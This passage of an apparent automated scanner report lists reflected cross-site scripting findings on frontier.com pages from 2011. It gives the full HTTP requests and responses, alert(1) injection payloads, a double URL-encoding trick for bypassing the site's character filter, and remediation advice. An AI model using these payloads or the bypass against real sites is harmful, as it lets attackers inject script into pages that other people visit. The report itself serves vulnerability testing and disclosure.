Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b was submitted in the REST URL parameter 2. This input was echoed as a4f61';alert(1)//5fb1c88860b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/yahoo/fpsearchlg.aspa4f61';alert(1)//5fb1c88860b?type=biz');//]]> ...[SNIP]...
2.90. http://www.frontier.com/yahoo/fy_excl2.aspx [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://www.frontier.com
Path: /yahoo/fy_excl2.aspx
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69d70'%3b8506878fe2 was submitted in the REST URL parameter 1. This input was echoed as 69d70';8506878fe2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yahoo69d70'%3b8506878fe2/fy_excl2.aspx HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D
Response (redirected)
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43315
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/yahoo69d70';8506878fe2/fy_excl2.aspx');//]]> ...[SNIP]...
2.91. http://www.frontier.com/yahoo/fy_excl2.aspx [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://www.frontier.com
Path: /yahoo/fy_excl2.aspx
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 747f9%2527%253balert%25281%2529%252f%252fcb0ef15e2ce was submitted in the REST URL parameter 2. This input was echoed as 747f9';alert(1)//cb0ef15e2ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /yahoo/fy_excl2.aspx747f9%2527%253balert%25281%2529%252f%252fcb0ef15e2ce HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43633
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/yahoo/fy_excl2.aspx747f9';alert(1)//cb0ef15e2ce');//]]> ...[SNIP]...
2.92. https://www.frontier.com/AgentOrdering/Login/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www.frontier.com
Path: /AgentOrdering/Login/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dcc6'%3balert(1)//b78c0a9a96c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7dcc6';alert(1)//b78c0a9a96c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /AgentOrdering/Login/?7dcc6'%3balert(1)//b78c0a9a96c=1 HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48631
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/AgentOrdering/Login/Default.aspx?7dcc6';alert(1)//b78c0a9a96c=1'); var Page_ValidationActive = false; if (typeof(ValidatorOnLoad) == "function") { ValidatorOnLoad(); }
function ValidatorOnSubmit() { if (Page_ValidationActive) { return Va ...[SNIP]...
2.93. https://www.frontier.com/AgentOrdering/Login/Default.aspx [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: https://www.frontier.com
Path: /AgentOrdering/Login/Default.aspx
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf4af'-alert(1)-'9ff1a208c26e1167f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /AgentOrderingcf4af'-alert(1)-'9ff1a208c26e1167f/Login/Default.aspx?__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE= ...[SNIP]...